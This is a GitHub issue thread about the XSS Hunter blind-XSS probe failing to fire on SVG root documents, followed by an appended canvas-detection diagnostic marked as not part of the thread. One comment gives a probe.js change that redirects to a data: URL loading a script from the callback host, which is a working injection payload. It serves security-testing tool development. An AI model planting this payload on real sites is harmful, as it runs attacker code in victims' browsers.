
XSSHunter fails to trigger on SVGDocument

Open xiaoyongwu opened this issue 8 years ago • 1 comments

This is a great tool for XSS testing, and while I was playing with it, I noticed that if the root document is an inline SVG image and using the XSSHunter probe, the XSSHunter JS callback fails to trigger.

Here's a change I made to probe.js, adding the following before the if( document.readyState == "complete" ) { line, which helps:

if( document instanceof SVGDocument ) {
    document.location="data:text/html,%3Cscript src=[HOST_URL]%3E%3C/script%3E";
}

Basically, this just creates a data URL and injects the script again from an HTMLDocument, or it might be just using the data URL as the payload.

xiaoyongwu avatar Oct 10 '16 20:10 xiaoyongwu

Was debugging this for a while. The reason is that html2canvas checks canvas support (https://github.com/niklasvh/html2canvas/blob/83e9b85e1eb27993d48132af0fbfb4ee2f13c887/src/core.js#L58).

For my test file the following causes "No canvas support":

typeof(document.createElement("canvas").getContext)    
"undefined"

Not sure how much work it would be to implement a nice "canvas not supported" way to gather the information in another way.

bayotop avatar Mar 31 '17 10:03 bayotop
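
Added example, not part of the thread and not XSS Hunter or html2canvas code: a diagnostic that shows why the check quoted above returns "undefined" in an SVG root document. In a document that is not HTML or XHTML, createElement() produces an element with no namespace, so it is not a canvas. The names detectCanvas and fakeDocument are hypothetical, and fakeDocument is a constructed stand-in that models this DOM rule so the block also runs outside a browser.

```javascript
const XHTML_NS = "http://www.w3.org/1999/xhtml";

// Report whether a canvas is usable in `doc`, and which call produced it.
function detectCanvas(doc) {
  // The check quoted in the thread: plain createElement().
  const plain = doc.createElement("canvas");
  if (typeof plain.getContext === "function") {
    return { supported: true, via: "createElement", reason: null };
  }
  // Outside HTML/XHTML documents the element above has a null namespace.
  // Asking for the XHTML namespace explicitly yields a real canvas element.
  const viaNs = doc.createElementNS(XHTML_NS, "canvas");
  if (typeof viaNs.getContext === "function") {
    return { supported: true, via: "createElementNS",
             reason: "createElement() is not HTML-namespaced in " + doc.contentType };
  }
  return { supported: false, via: null, reason: "no canvas implementation" };
}

// Constructed stand-in for a browser Document (assumption: it models the DOM
// rule that createElement() uses the HTML namespace only when the document is
// HTML or its content type is application/xhtml+xml).
function fakeDocument(contentType, hasCanvas = true) {
  const isHtml = contentType === "text/html" || contentType === "application/xhtml+xml";
  const make = (ns, name) => {
    const el = { namespaceURI: ns, localName: name };
    if (hasCanvas && ns === XHTML_NS && name === "canvas") el.getContext = () => ({});
    return el;
  };
  return {
    contentType,
    createElement: (name) => make(isHtml ? XHTML_NS : null, name),
    createElementNS: (ns, name) => make(ns, name),
  };
}

// In a browser this inspects the real document; elsewhere, the stand-ins.
const docs = typeof document !== "undefined"
  ? [document]
  : [fakeDocument("text/html"), fakeDocument("image/svg+xml")];
for (const d of docs) console.log(d.contentType, detectCanvas(d));
```

When `supported` is false, the returned `reason` lets a caller skip the screenshot step and still report the remaining data.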